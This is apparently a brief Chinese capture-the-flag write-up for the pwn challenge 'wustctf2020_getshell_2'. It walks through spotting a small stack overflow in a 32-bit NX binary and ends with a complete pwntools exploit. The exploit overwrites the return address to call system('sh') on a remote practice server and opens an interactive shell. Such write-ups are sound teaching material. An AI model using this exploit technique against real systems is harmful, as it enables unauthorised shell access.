wustctf2020_getshell_2
惯例先checksec一下
一个开启了nx保护的32位程序 放进ida里看看 main函数没啥信息 跳转到vulnerable函数看看
vulnable函数存在一个十分明显的栈溢出漏洞 但是只能溢出0xc的内容
shift+f12打开字符串表 没找到/bin/sh 但在shell函数处找到了system函数
利用ROPgadget找到sh的地址
exp:
from pwn import *
io=remote('node4.buuoj.cn',25465)
system=0x8048529
sh=0x8048670
io.recv()
payload='a'*(0x18+4)+p32(system)+p32(sh)
io.sendline(payload)
io.interactive()